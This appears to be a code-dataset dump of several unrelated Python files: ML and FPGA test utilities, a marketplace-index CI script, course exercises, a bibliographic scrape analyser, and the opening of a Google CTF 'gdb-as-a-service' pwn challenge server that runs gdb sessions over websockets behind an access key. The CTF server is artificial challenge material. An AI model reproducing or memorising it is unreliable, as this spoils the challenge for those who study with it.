input_shape, target_shape, device_type, machine_ids, device_counts
):
input = np.random.random(size=input_shape).astype(np.float32)
target = np.random.random(size=target_shape).astype(np.float32)
assert device_type in ["cpu", "gpu"]
func_config = flow.FunctionConfig()
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_counts)
else:
flow.config.gpu_device_num(device_counts)
func_config.default_placement_scope(flow.scope.placement(device_type, machine_ids))
func_config.default_logical_view(flow.scope.consistent_view())
def np_l1loss(np_input, np_target):
np_l1 = np.abs(np_target - np_input)
np_l1_mean = np.mean(np_l1)
np_l1_sum = np.sum(np_l1)
np_l1_dict = {
"np_l1_loss": np_l1,
"np_l1_loss_mean": np_l1_mean,
"np_l1_loss_sum": np_l1_sum,
}
return np_l1_dict
def np_l1_loss_diff(np_input, np_target):
# Use numpy to compute diff
original_shape = np_target.shape
elemcnt = np_target.size
prediction = np_input.reshape(-1)
label = np_target.reshape(-1)
prediction_grad = np.zeros((elemcnt)).astype(prediction.dtype)
for i in np.arange(elemcnt):
diff = prediction[i] - label[i]
prediction_grad[i] = np.sign(diff)
grad_mean = prediction_grad.reshape(original_shape) / elemcnt
# TODO: if you want to get the grad when the reduction = "sum", you can use the follow code
# grad_sum = prediction_grad.reshape(original_shape)
grad_dict = {
"np_grad_mean": grad_mean,
}
return grad_dict
# Use Numpy to compute l1 loss
np_out_l1loss_dict = np_l1loss(input, target)
# Use Numpy to compute l1 grad
np_grad_dict = np_l1_loss_diff(input, target)
def assert_prediction_grad(blob: tp.Numpy):
# Evaluate the gradient. Here we only test the reduction type == "mean"
assert np.allclose(blob, np_grad_dict["np_grad_mean"])
@flow.global_function(type="train", function_config=func_config)
def oneflow_l1loss(
of_input: tp.Numpy.Placeholder(shape=input.shape),
of_target: tp.Numpy.Placeholder(shape=target.shape),
) -> Dict[str, tp.Numpy]:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=target.shape,
dtype=flow.float32,
initializer=flow.constant_initializer(0),
name="v",
)
x_var = of_input + v
# watch the diff
flow.watch_diff(x_var, assert_prediction_grad)
l1loss = flow.nn.L1Loss(x_var, of_target, reduction="none", name="of_l1loss")
l1loss_mean = flow.nn.L1Loss(
x_var, of_target, reduction="mean", name="of_l1loss_mean"
)
l1loss_sum = flow.nn.L1Loss(
x_var, of_target, reduction="sum", name="of_l1loss_sum"
)
with flow.scope.placement(device_type, "0:0"):
# We only test reduction="mean" diff
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [1e-3]), momentum=0
).minimize(l1loss_mean)
return {
"of_l1_loss": l1loss,
"of_l1_loss_mean": l1loss_mean,
"of_l1_loss_sum": l1loss_sum,
}
of_out_l1loss_dict = oneflow_l1loss(input, target)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss"], np_out_l1loss_dict["np_l1_loss"]
)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss_mean"][0], np_out_l1loss_dict["np_l1_loss_mean"]
)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss_sum"][0], np_out_l1loss_dict["np_l1_loss_sum"]
)
def _gen_arg_dict(shape, device_type, machine_ids, device_counts):
# Generate a dict to pass parameter to test case
arg_dict = OrderedDict()
arg_dict["input_shape"] = [shape]
arg_dict["target_shape"] = [shape]
arg_dict["device_type"] = [device_type]
arg_dict["machine_ids"] = [machine_ids]
arg_dict["device_counts"] = [device_counts]
return arg_dict
@flow.unittest.skip_unless_1n1d()
class Testl1loss1n1d(flow.unittest.TestCase):
def test_l1loss_cpu(test_case):
arg_dict = _gen_arg_dict(
shape=(16, 3), device_type="cpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_l1loss_gpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16, 32), device_type="gpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
@flow.unittest.skip_unless_1n2d()
class Testl1loss1n2d(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_l1loss_gpu_1n2d(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 32, 16), device_type="gpu", machine_ids="0:0-1", device_counts=2
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
if __name__ == "__main__":
unittest.main()
| 33.540984 | 99 | 0.665689 |
865144cd196eb39a73555fc643c117d083a615cc | 744 | py | Python | Buta Nicolae/threads.py | RazvanBalau/parallel-2020 | bd9c0dea6cc70e167320f64632d7a235522dfdb3 | [
"MIT"
] | null | null | null | Buta Nicolae/threads.py | RazvanBalau/parallel-2020 | bd9c0dea6cc70e167320f64632d7a235522dfdb3 | [
"MIT"
] | null | null | null | Buta Nicolae/threads.py | RazvanBalau/parallel-2020 | bd9c0dea6cc70e167320f64632d7a235522dfdb3 | [
"MIT"
] | 23 | 2020-01-15T15:02:39.000Z | 2020-01-15T17:23:03.000Z | import threading
from multiprocessing import Queue
results = []
results2 = []
def take_numbers(q):
print('Enter the numbers:')
for i in range(0,3):
num1 = int(input('Enter first number: '))
num2 = int(input('Enter second number: '))
q.put(num1)
q.put(num2)
def add_num(q):
for i in range(0,3):
num1 = q.get()
num2 = q.get()
results.append(num1+num2)
results2.append(num1-num2)
q = Queue()
t2 = threading.Thread(target=add_num, args=(q, ))
t1 = threading.Thread(target=take_numbers, args=(q, ))
t2.start()
t1.start()
t2.join()
t1.join()
q.close()
for result in results:
print ("adunare =", result)
for result in results2:
print ("scadere =", result) | 20.666667 | 54 | 0.606183 |
d4c7b73306f8c0594f64a791f8292624d0ac8d82 | 11,237 | py | Python | Tests/Marketplace/prepare_public_index_for_private_testing.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Tests/Marketplace/prepare_public_index_for_private_testing.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Tests/Marketplace/prepare_public_index_for_private_testing.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import time
import os
import sys
import shutil
import json
import argparse
from zipfile import ZipFile
from contextlib import contextmanager
from datetime import datetime
from Tests.private_build.upload_packs_private import download_and_extract_index, update_index_with_priced_packs, \
extract_packs_artifacts
from Tests.Marketplace.marketplace_services import init_storage_client
from Tests.scripts.utils.log_util import install_logging
from Tests.scripts.utils import logging_wrapper as logging
MAX_SECONDS_TO_WAIT_FOR_LOCK = 600
LOCK_FILE_PATH = 'lock.txt'
@contextmanager
def lock_and_unlock_dummy_index(public_storage_bucket, dummy_index_lock_path):
try:
acquire_dummy_index_lock(public_storage_bucket, dummy_index_lock_path)
yield
except Exception:
logging.exception("Error in dummy index lock context manager.")
finally:
release_dummy_index_lock(public_storage_bucket, dummy_index_lock_path)
def change_pack_price_to_zero(path_to_pack_metadata):
with open(path_to_pack_metadata, 'r') as pack_metadata_file:
pack_metadata = json.load(pack_metadata_file)
pack_metadata['price'] = 0
with open(path_to_pack_metadata, 'w') as pack_metadata_file:
json.dump(pack_metadata, pack_metadata_file, indent=4)
def change_packs_price_to_zero(public_index_folder_path):
paths_to_packs_in_merged_index = [pack_dir.path for pack_dir in os.scandir(public_index_folder_path) if
pack_dir.is_dir()]
for path_to_pack in paths_to_packs_in_merged_index:
path_to_pack_metadata = os.path.join(path_to_pack, 'metadata.json')
change_pack_price_to_zero(path_to_pack_metadata)
def merge_private_index_into_public_index(public_index_folder_path, private_index_folder_path):
packs_in_private_index = [pack_dir.name for pack_dir in os.scandir(private_index_folder_path) if pack_dir.is_dir()]
for pack_name in packs_in_private_index:
path_to_pack_in_private_index = os.path.join(private_index_folder_path, pack_name)
path_to_pack_in_public_index = os.path.join(public_index_folder_path, pack_name)
shutil.copy(path_to_pack_in_private_index, path_to_pack_in_public_index)
def upload_modified_index(public_index_folder_path, extract_destination_path, public_ci_dummy_index_blob, build_number,
private_packs):
"""Upload updated index zip to cloud storage.
Args:
public_index_folder_path (str): public index folder full path.
extract_destination_path (str): extract folder full path.
public_ci_dummy_index_blob (Blob): google cloud storage object that represents the dummy index.zip blob.
build_number (str): circleCI build number, used as an index revision.
private_packs (list): List of private packs and their price.
"""
with open(os.path.join(public_index_folder_path, "index.json"), "w+") as index_file:
for private_pack in private_packs:
private_pack['price'] = 0
index = {
'revision': build_number,
'modified': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'packs': private_packs
}
json.dump(index, index_file, indent=4)
index_zip_name = os.path.basename(public_index_folder_path)
index_zip_path = shutil.make_archive(base_name=public_index_folder_path, format="zip",
root_dir=extract_destination_path, base_dir=index_zip_name)
try:
public_ci_dummy_index_blob.reload()
public_ci_dummy_index_blob.cache_control = "no-cache,max-age=0" # disabling caching for index blob
public_ci_dummy_index_blob.upload_from_filename(index_zip_path)
logging.success("Finished uploading index.zip to storage.")
except Exception:
logging.exception("Failed in uploading index. Mismatch in index file generation.")
sys.exit(1)
finally:
shutil.rmtree(public_index_folder_path)
def option_handler():
"""Validates and parses script arguments.
Returns:
Namespace: Parsed arguments object.
"""
parser = argparse.ArgumentParser(description="Store packs in cloud storage.")
# disable-secrets-detection-start
parser.add_argument('-b', '--public_bucket_name', help="CI public bucket name", required=True)
parser.add_argument('-pb', '--private_bucket_name', help="CI private bucket name", required=True)
parser.add_argument('-s', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
parser.add_argument('-n', '--ci_build_number',
help="CircleCi build number (will be used as hash revision at index file)", required=True)
parser.add_argument('-e', '--extract_public_index_path', help="Full path of folder to extract the public index",
required=True)
parser.add_argument('-sb', '--storage_base_path', help="Storage base path of the directory to upload to.",
required=False)
parser.add_argument('-p', '--pack_name', help="Modified pack to upload to gcs.")
parser.add_argument('-a', '--artifacts_path', help="The full path of packs artifacts", required=True)
parser.add_argument('-ea', '--extract_artifacts_path', help="Full path of folder to extract wanted packs",
required=True)
parser.add_argument('-di', '--dummy_index_dir_path', help="Full path to the dummy index in the private CI bucket",
required=True)
# disable-secrets-detection-end
return parser.parse_args()
def is_dummy_index_locked(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
return dummy_index_lock_blob.exists()
def lock_dummy_index(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
with open(LOCK_FILE_PATH, 'w') as lock_file:
lock_file.write('locked')
with open(LOCK_FILE_PATH, 'rb') as lock_file:
dummy_index_lock_blob.upload_from_file(lock_file)
def acquire_dummy_index_lock(public_storage_bucket, dummy_index_lock_path):
total_seconds_waited = 0
while is_dummy_index_locked(public_storage_bucket, dummy_index_lock_path):
if total_seconds_waited >= MAX_SECONDS_TO_WAIT_FOR_LOCK:
logging.critical("Error: Failed too long to acquire lock, exceeded max wait time.")
sys.exit(1)
if total_seconds_waited % 60 == 0:
# Printing a message every minute to keep the machine from dying due to no output
logging.info("Waiting to acquire lock.")
total_seconds_waited += 10
time.sleep(10)
lock_dummy_index(public_storage_bucket, dummy_index_lock_path)
def release_dummy_index_lock(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
dummy_index_lock_blob.delete()
os.remove(LOCK_FILE_PATH)
def add_private_packs_from_dummy_index(private_packs, dummy_index_blob):
downloaded_dummy_index_path = 'current_dummy_index.zip'
extracted_dummy_index_path = 'dummy_index'
dummy_index_json_path = os.path.join(extracted_dummy_index_path, 'index', 'index.json')
dummy_index_blob.download_to_filename(downloaded_dummy_index_path)
os.mkdir(extracted_dummy_index_path)
if os.path.exists(downloaded_dummy_index_path):
with ZipFile(downloaded_dummy_index_path, 'r') as index_zip:
index_zip.extractall(extracted_dummy_index_path)
with open(dummy_index_json_path) as index_file:
index_json = json.load(index_file)
packs_from_dummy_index = index_json.get('packs', [])
for pack in private_packs:
is_pack_in_dummy_index = any(
[pack['id'] == dummy_index_pack['id'] for dummy_index_pack in packs_from_dummy_index])
if not is_pack_in_dummy_index:
packs_from_dummy_index.append(pack)
os.remove(downloaded_dummy_index_path)
shutil.rmtree(extracted_dummy_index_path)
return packs_from_dummy_index
def main():
install_logging('prepare_public_index_for_private_testing.log', logger=logging)
upload_config = option_handler()
service_account = upload_config.service_account
build_number = upload_config.ci_build_number
public_bucket_name = upload_config.public_bucket_name
private_bucket_name = upload_config.private_bucket_name
storage_base_path = upload_config.storage_base_path
extract_public_index_path = upload_config.extract_public_index_path
changed_pack = upload_config.pack_name
extract_destination_path = upload_config.extract_artifacts_path
packs_artifacts_path = upload_config.artifacts_path
dummy_index_dir_path = upload_config.dummy_index_dir_path
dummy_index_path = os.path.join(dummy_index_dir_path, 'index.zip')
dummy_index_lock_path = os.path.join(dummy_index_dir_path, 'lock.txt')
storage_client = init_storage_client(service_account)
public_storage_bucket = storage_client.bucket(public_bucket_name)
private_storage_bucket = storage_client.bucket(private_bucket_name)
dummy_index_blob = public_storage_bucket.blob(dummy_index_path)
with lock_and_unlock_dummy_index(public_storage_bucket, dummy_index_lock_path):
extract_packs_artifacts(packs_artifacts_path, extract_destination_path)
public_index_folder_path, public_index_blob, _ = download_and_extract_index(public_storage_bucket,
extract_public_index_path, storage_base_path)
# In order for the packs to be downloaded successfully, their price has to be 0
change_packs_price_to_zero(public_index_folder_path)
private_packs, private_index_path, private_index_blob = update_index_with_priced_packs(private_storage_bucket,
extract_destination_path,
public_index_folder_path,
changed_pack, True,
storage_base_path)
private_packs = add_private_packs_from_dummy_index(private_packs, dummy_index_blob)
upload_modified_index(public_index_folder_path, extract_public_index_path, dummy_index_blob, build_number,
private_packs)
if __name__ == '__main__':
main()
| 48.021368 | 129 | 0.707128 |
be04c82cd5f62929d01752841a8ec17a1254d468 | 291 | py | Python | exercises/pt/exc_01_03_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 2,085 | 2019-04-17T13:10:40.000Z | 2022-03-30T21:51:46.000Z | exercises/pt/exc_01_03_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 79 | 2019-04-18T14:42:55.000Z | 2022-03-07T08:15:43.000Z | exercises/pt/exc_01_03_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 361 | 2019-04-17T13:34:32.000Z | 2022-03-28T04:42:45.000Z | # Importar a classe da língua inglesa (English) e criar um objeto nlp
from ____ import ____
nlp = ____
# Processar o texto
doc = ____("I like tree kangaroos and narwhals.")
# Selecionar o primeiro token
first_token = doc[____]
# Imprimir o texto do primeito token
print(first_token.____)
| 22.384615 | 69 | 0.75945 |
0775eae440b3ed8a8de73f26dfbbc57343a6323d | 6,670 | py | Python | text_selection/analyse_zenon_scrape.py | dainst/chronoi-corpus-processing | 7f508a7572e1022c4c88d1477db029e6619a1f0c | [
"MIT"
] | null | null | null | text_selection/analyse_zenon_scrape.py | dainst/chronoi-corpus-processing | 7f508a7572e1022c4c88d1477db029e6619a1f0c | [
"MIT"
] | null | null | null | text_selection/analyse_zenon_scrape.py | dainst/chronoi-corpus-processing | 7f508a7572e1022c4c88d1477db029e6619a1f0c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import csv
import furl
import json
import re
import sys
from collections import defaultdict
def filter_records_without_url(records: []) -> []:
return [r for r in records if any(r.get("urls"))]
def build_furl(url: str) -> furl.furl:
try:
furl_obj = furl.furl(url)
if not furl_obj.host:
furl_obj = furl.furl("http://" + url)
return furl_obj
except ValueError:
return furl.furl("https://invalid-url.xyz")
def determine_host(url: str) -> str:
furl_obj = build_furl(url)
return re.sub(r"^www[0-9]*\.", "", furl_obj.host)
def build_hosts_to_urls(records: []) -> {str: {str}}:
result = defaultdict(set)
for record in records:
for url in record.get("urls"):
host = determine_host(url.get("url"))
result[host].add(url.get("url"))
return result
def print_most_common_url_hosts(hosts_to_urls: {}, n: int):
hosts = [h for h in hosts_to_urls.keys() if len(hosts_to_urls[h]) > n]
hosts = sorted(hosts, key=lambda h: len(hosts_to_urls[h]))
for host in hosts:
print("% 6d\t%s" % (len(hosts_to_urls[host]), host))
def print_urls_for_host(hosts_to_urls: {}, host: str):
urls = hosts_to_urls.get(host, [])
for url in urls:
print(url)
if not any(urls):
print(f"No urls for host: '{host}'", file=sys.stderr)
def print_how_often_url_patterns_cooccur(records: [{}], pattern1: str, pattern2: str):
# It should be ok, to only pattern match the hosts here...
ids1 = {r.get("id") for r in records if record_has_matching_url(r, pattern1)}
ids2 = {r.get("id") for r in records if record_has_matching_url(r, pattern2)}
ids_both = ids1.intersection(ids2)
for host, number in {pattern1: len(ids1), pattern2: len(ids2), "both": len(ids_both)}.items():
print(f"{host}: {number}")
def record_has_matching_url(record: {}, pattern: str) -> bool:
return any(record_get_urls_matching(record, pattern))
def record_get_urls_matching(record: {}, pattern: str) -> [{}]:
result = []
for url in record.get("urls"):
if any(re.findall(pattern, url.get("url"))):
result.append(url)
return result
def record_remove_urls_not_matching(record: {}, pattern: str):
record["urls"] = record_get_urls_matching(record, pattern)
def earliest_year(year_strings: [str]) -> str:
years = []
for year_s in year_strings:
try:
years.append(int(year_s))
except ValueError:
print(f"Not a string that is a year: '{year_s}'", file=sys.stderr)
continue
return str(sorted(years)[0]) if any(years) else ""
def main(args: argparse.Namespace):
with open(args.scrape_file, "r") as file:
records = json.load(file)
records = filter_records_without_url(records)
# filter urls by the user-provided filter list
if args.desc_filters:
with open(args.desc_filters, "r") as file:
filters = file.read().splitlines()
for record in records:
record["urls"] = [url for url in record.get("urls") if url.get("desc") not in filters]
records = filter_records_without_url(records)
# print unique hosts or urls, then exit
if args.print_host_urls or args.print_common_hosts >= 0:
hosts_to_urls = build_hosts_to_urls(records)
if args.print_common_hosts >= 0:
print_most_common_url_hosts(hosts_to_urls, n=args.print_common_hosts)
elif args.print_host_urls:
print_urls_for_host(hosts_to_urls, host=args.print_host_urls)
exit(0)
# check in how many records the two given hosts co-occur, then exit
if args.patterns_cooccur:
host1, host2 = args.patterns_cooccur.split(",")
print_how_often_url_patterns_cooccur(records, host1, host2)
exit(0)
# do some selection based on a url pattern, remove all non-matching urls from the record
if args.select_by_url:
pattern = args.select_by_url
records = [r for r in records if record_has_matching_url(r, pattern)]
for record in records:
record_remove_urls_not_matching(record, pattern)
# sort the records by id, to be extra sure, that we get the same order every time this is called
# print each line as a csv column
records = sorted(records, key=lambda r: r.get("id"))
writer = csv.writer(sys.stdout, delimiter=",", quoting=csv.QUOTE_ALL)
for record in records:
to_print = []
if args.print_id:
to_print.append(record.get("id", ""))
if args.print_url:
to_print.append(record.get("urls")[0].get("url") if any(record.get("urls")) else "")
if args.print_pub_date:
to_print.append(earliest_year(record.get("publicationDates", [])))
if args.print_languages:
to_print.append("|".join(record.get("languages", [])))
writer.writerow(to_print)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Process a file with zenon json records and print some information about them.")
parser.add_argument("scrape_file", type=str, help="The file that contains the zenon dumps as json.")
parser.add_argument("--desc-filters", type=str, help="A file to filter urls by. Excludes urls with 'desc' fields matching a line in the file.")
# these are arguments to print some specific information
parser.add_argument("--print-common-hosts", type=int, default=-1, help="Print hosts that appear more than n times in the records urls, then exit.")
parser.add_argument("--print-host-urls", type=str, help="Print all urls for the host, then exit.")
parser.add_argument("--patterns-cooccur", type=str, help="Format: 'pattern1,pattern2', print how often these occur in single records url fields, then exit.")
# these are meant to work together select by a url pattern then print information about the records
parser.add_argument("--select-by-url", type=str, help="Give a pattern for a url to select records by.")
parser.add_argument("--print-url", action="store_true", help="Print the first of each urls for the selected records. (Ignores other urls present on the records if --select-url is given.)")
parser.add_argument("--print-pub-date", action="store_true", help="Print the earliest publication year for each of the selected records.")
parser.add_argument("--print-id", action="store_true", help="Print the selected records' ids")
parser.add_argument("--print-languages", action="store_true", help="Print the selected records' languages")
main(parser.parse_args())
| 40.670732 | 192 | 0.669715 |
07a919ed87f13258649cbf2c9c6e2971a4de419e | 5,568 | py | Python | AI_Engine_Development/Feature_Tutorials/07-AI-Engine-Floating-Point/Utils/GenerationLib.py | jlamperez/Vitis-Tutorials | 9a5b611caabb5656bbb2879116e032227b164bfd | [
"Apache-2.0"
] | 1 | 2022-03-09T06:15:43.000Z | 2022-03-09T06:15:43.000Z | AI_Engine_Development/Feature_Tutorials/07-AI-Engine-Floating-Point/Utils/GenerationLib.py | jlamperez/Vitis-Tutorials | 9a5b611caabb5656bbb2879116e032227b164bfd | [
"Apache-2.0"
] | null | null | null | AI_Engine_Development/Feature_Tutorials/07-AI-Engine-Floating-Point/Utils/GenerationLib.py | jlamperez/Vitis-Tutorials | 9a5b611caabb5656bbb2879116e032227b164bfd | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2020–2021 Xilinx, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from math import *
import random
def GenerateTestVector(dtval,pliow,NPhases_s,NStreams_s,NSamples_s,NFrames_s,SeqType_s,Basename_s):
print('DtVal : ',dtval.get())
print('PLIO width : ',pliow.get())
print('NPhases : ',NPhases_s.get())
print('NStreams : ',NStreams_s.get())
print('NSamples : ',NSamples_s.get())
print('NFrames : ',NFrames_s.get())
print('Type of Sequence : ',SeqType_s.get())
print('Base filename : ',Basename_s.get())
NPhases = int(NPhases_s.get())
NStreams = int(NStreams_s.get())
LFrame = int(NSamples_s.get())
NFrames = int(NFrames_s.get())
SequenceType = SeqType_s.get()
Basename = Basename_s.get()
#parameters that should be in the GUI
# SequenceType ='Linear' # 'SinCos' 'Linear' 'Random' 'Dirac'
# Basename = 'PhaseIn'
NSamples = NPhases*NStreams*LFrame*NFrames;
NSamples1 = NPhases*NStreams*LFrame*(NFrames+1); # A little longer to allow for delay in streams
NBitsData = 32;
if( dtval.get() == 'int16'):
NBitsData = 16
HasImag = 0
if (dtval.get() == 'cint16'):
HasImag = 1
if(SequenceType != 'SinCos' and SequenceType != 'Linear' and SequenceType != 'Random' and SequenceType != 'Dirac'):
print ('Unknown Sequence Type')
return
# Create the overall signal that will be distributed over all streams
# it is already separated in phases
S = np.zeros((NPhases,int(NSamples1/NPhases),1+HasImag))
for i in range(int(NSamples1/NPhases)):
for p in range (NPhases):
k = i*NPhases+p
if (SequenceType == 'SinCos'):
vr = int(5000*cos(6.28*5/(NPhases*NStreams*LFrame)*k))
vi = int(5000*sin(6.28*5/(NPhases*NStreams*LFrame)*k))
elif (SequenceType == 'Linear'):
vr = k
vi = -k
elif (SequenceType == 'Random'):
vr = random.randint(-5000,5000)
vi = random.randint(-5000,5000)
elif (SequenceType == 'Dirac'):
vr = 0
vi = 0
if(k%151 == 1):
vr = 1
elif(k%151 == 40):
vi = 1
elif(k%151 == 81):
vr = 2
elif(k%151 == 115):
vi = -2
# if(k%311 == 50):
# vr = 1
# S[p,i,0] =
# if(HasImag==1):
# S[p,i,1] = int(5000*sin(6.28*5/(NPhases*NStreams*LFrame)*k))
S[p,i,0] = vr
if (HasImag == 1 ):
S[p,i,1] = vi
PLIOwidth = int(pliow.get())
NSamplesPerLine = int(PLIOwidth/NBitsData) # Data are read in blocks of 128 bits (4 data in cint16)
# Create an Input test Vector in TestInputS.txt
FileNames = [];
# Easiest case: 1 stream per AI Engine
if (NStreams == 1):
#Creates list of filenames
for Phi in range(NPhases):
FileNames.append(Basename+'_'+str(Phi)+'.txt')
#Open all files
fds = [open(path, 'w') for path in FileNames]
#Fill all files with the right data
for p in range(NPhases):
fd = fds[p]
for s in range(int(NSamples1/NPhases/NSamplesPerLine)):
for d in range(NSamplesPerLine):
index = s*NSamplesPerLine + d
fd.write(str(int(S[p,index,0]))+' ')
if(HasImag):
fd.write(str(int(S[p,index,1]))+' ')
fd.write('\n')
for fd in fds:
fd.close()
if (NStreams == 2):
#Creates list of filenames
for Phi in range(NPhases):
for Stream in range(NStreams):
FileNames.append('PhaseIn_'+str(Phi)+'_'+str(Stream)+'.txt')
# Hash table to associate data to streams
NSamplesIn128bits = int(128/NBitsData )
H = np.zeros((int(NSamples1/NPhases/2),2))
H = H.astype('int32')
index = np.zeros(2)
index = index.astype('int32')
for s in range(int(NSamples1/NPhases)):
k = int(s/NSamplesIn128bits) # Block order
i = k%2 # Which streams
H[index[i],i] = s
index[i] = index[i]+1
#Open all files
fds = [open(path, 'w') for path in FileNames]
#Fill all files with the right data
for p in range(NPhases):
for stream in range(2):
fd = fds[2*p+stream]
for s in range(int(NSamples1/NPhases/NSamplesPerLine/NStreams)):
for d in range(NSamplesPerLine):
index = s*NSamplesPerLine + d
fd.write(str(int(S[p,H[index,stream],0]))+' ')
if(HasImag):
fd.write(str(int(S[p,H[index,stream],1]))+' ')
fd.write('\n')
for fd in fds:
fd.close()
| 33.341317 | 119 | 0.541667 |
9c5ca9cec48517b47b0e018883a0875e922d1924 | 4,921 | py | Python | 2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py | iicarus-bit/google-ctf | 4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b | [
"Apache-2.0"
] | 2,757 | 2018-04-28T21:41:36.000Z | 2022-03-29T06:33:36.000Z | 2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py | iicarus-bit/google-ctf | 4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b | [
"Apache-2.0"
] | 20 | 2019-07-23T15:29:32.000Z | 2022-01-21T12:53:04.000Z | 2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py | iicarus-bit/google-ctf | 4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b | [
"Apache-2.0"
] | 449 | 2018-05-09T05:54:05.000Z | 2022-03-30T14:54:18.000Z | #!/usr/bin/env python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aiohttp import web
import capstone
import functools
from gdbproc import GDBProcess
import socketio
import asyncio
import codecs
import os
enable_logging = False
premium = 'PREMIUM' in os.environ
if premium:
access_key = os.getenv('PREMIUM_KEY')
runnable = ['/home/user/printwebflag']
else:
access_key = os.getenv('TRIAL_KEY')
runnable = ['/bin/sleep', '20']
MAX_INSN_LEN = 15
capstone_md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
sio = socketio.AsyncServer()
app = web.Application()
sio.attach(app)
with open('index.html') as f:
index_html = f.read()
async def index(request):
if not 'key' in request.cookies:
return web.Response(status=401, text='permission denied (missing key)', content_type='text/html')
if request.cookies['key'] != access_key:
return web.Response(status=401, text='permission denied (invalid key)', content_type='text/html')
return web.Response(text=index_html, content_type='text/html')
app.add_routes([web.get('/', index),
web.get('/{name}', index)])
gdb_sessions = {}
stop_queue_readers = {}
async def on_shutdown(app):
await asyncio.gather(delete_gdb_process(sid) for sid in gdb_sessions.keys())
app.on_shutdown.append(on_shutdown)
def log(msg):
if enable_logging:
print('[*] {}'.format(msg))
@sio.on('connect')
def connect(sid, environ):
log('connected {}'.format(sid))
if not 'key={}'.format(access_key) in environ['HTTP_COOKIE']:
log('access_key not found {}'.format(environ['HTTP_COOKIE']))
return False
@sio.on('disconnect')
async def disconnect(sid):
log('disconnected {}'.format(sid))
await delete_gdb_process(sid)
async def stop_queue_reader(sid, queue):
while True:
pkt = await queue.get()
await update_all(sid)
async def create_gdb_process(sid):
stop_queue = asyncio.Queue()
gdb_sessions[sid] = await GDBProcess.create(runnable, stop_queue, env={'KEY': access_key}, log_fn=log)
loop = asyncio.get_event_loop()
stop_queue_readers[sid] = loop.create_task(stop_queue_reader(sid, stop_queue))
async def delete_gdb_process(sid):
if sid in gdb_sessions:
stop_queue_readers[sid].cancel()
del stop_queue_readers[sid]
await gdb_sessions[sid].release()
del gdb_sessions[sid]
@sio.on('start')
async def start(sid):
await delete_gdb_process(sid)
await create_gdb_process(sid)
# Reading registers doesn't work on ubuntu 18.04 for some reason.
# Step once as a work around
step(sid)
async def update_all(sid):
log('updating sid {}'.format(sid))
regs_task = getregs(sid)
maps_task = getmaps(sid)
asm_task = getasm(sid, {'addr': await gdb_sessions[sid].get_reg('rip'), 'count': 100})
await asyncio.gather(regs_task, maps_task, asm_task)
log('update done')
@sio.on('step')
def step(sid):
gdb_sessions[sid].step()
@sio.on('cont')
def cont(sid):
gdb_sessions[sid].cont()
@sio.on('stop')
def stop(sid):
gdb_sessions[sid].interrupt()
async def getregs(sid):
regs = await gdb_sessions[sid].get_regs()
